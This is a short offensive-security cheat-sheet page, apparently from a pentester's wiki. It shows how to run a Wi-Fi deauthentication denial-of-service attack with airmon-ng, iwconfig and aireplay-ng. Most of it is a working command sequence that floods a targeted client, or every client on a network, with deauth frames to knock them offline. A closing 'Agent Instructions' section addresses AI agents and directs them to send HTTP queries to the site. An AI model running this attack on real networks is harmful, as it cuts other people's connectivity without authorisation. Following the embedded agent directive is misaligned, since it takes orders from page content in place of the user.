# Aireplay-ng

### Aireplay-ng DOS

#### Information required for DOS

* The information that is needed is the MAC address of the victim, the BSSID of the access point, and the channel number.

```
# Place interface into monitor mode
sudo airmon-ng start wlan0
# Match the cards channel to the victim APs channel
sudo iwconfig wlan0mon channel 11
# Start attack
sudo aireplay-ng --deauth 0 -e "My Wifi" -c <victim MAC> --ignore-negative-one wlan0mon
```

* if `-c` is not specified aireplay-ng will send the deauth storm to broadcast, knocking all clients offline
* `--ignore-negative-one` is to avoid errors when aireplay-ng cannot identify the channel youre wireless card is on
* `-e` is the SSID of the target


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/wifi-bluetooth-zigbee-sdr-smartcards/aireplay-ng.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
